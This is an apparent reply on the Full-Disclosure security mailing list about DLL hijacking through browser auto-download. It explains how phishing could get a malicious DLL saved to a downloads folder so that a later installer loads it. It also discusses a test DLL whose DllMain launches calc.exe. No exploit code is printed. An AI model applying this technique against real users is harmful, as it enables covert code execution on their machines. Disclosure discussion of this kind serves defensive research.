1. The attack is aiming at a very low hanging fruit, so low in fact it probably fell on the ground once and has a few bugs on it, this is the nature of phishing. If the redirect is well designed or the method of the delivery is convincing enough, they will click save assuming that only execution of it would be dangerous, the vendor page will be convincing enough in itself (theoretically) to lead them to the update/install. Even if they assumed it was sketchy chances are they would still leave it in their downloads folder or remove the entry from their list of previously downloaded files not running it.. Not clicking the installer wouldn't be a loss either because the next update/install they run (be it days, weeks, or months) will likely load the DLL.
2. That was a dumb addition on my part, every time DllMain is entered it will launch calc.exe, if I had removed the comment from that line it would have exited on the first execution but instead this will launch for each call.. Which is sometimes quite a bunch, not ideal for testing lots of installers but fun to watch? On Mon, Aug 13, 2012 at 3:02 PM, Christian Sciberras <[email protected]>wrote: > I've got two concerns about this: > > > 1. Either way you put it, I can't see how one can make a convincing > argument out of downloading a DLL file. > Asking laymen, they'd ask "what's a dll for? weren't updates done with > exe/msi/etc? why's it got that funny icon?" > > 2. I'm a bit curious about your choice of code, and why you commented out > exit(0); (what's the point anyway?) > > > Cheers, > Chris. > > > > > On Mon, Aug 13, 2012 at 7:19 PM, Gynvael Coldwind <[email protected]>wrote: > >> Well, what can I say - your write up is accurate. >> >> Though last time I've seen it, around 5 years ago, it was still called >> DLL spoofing and not DLL hijacking, and was one of the arguments why >> "carpet bombing" (automatic download) in Safair/Chrome must be fixed >> :) >> E.g. http://gynvael.coldwind.pl/?id=55 >> >> -- >> gynvael.coldwind//vx >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
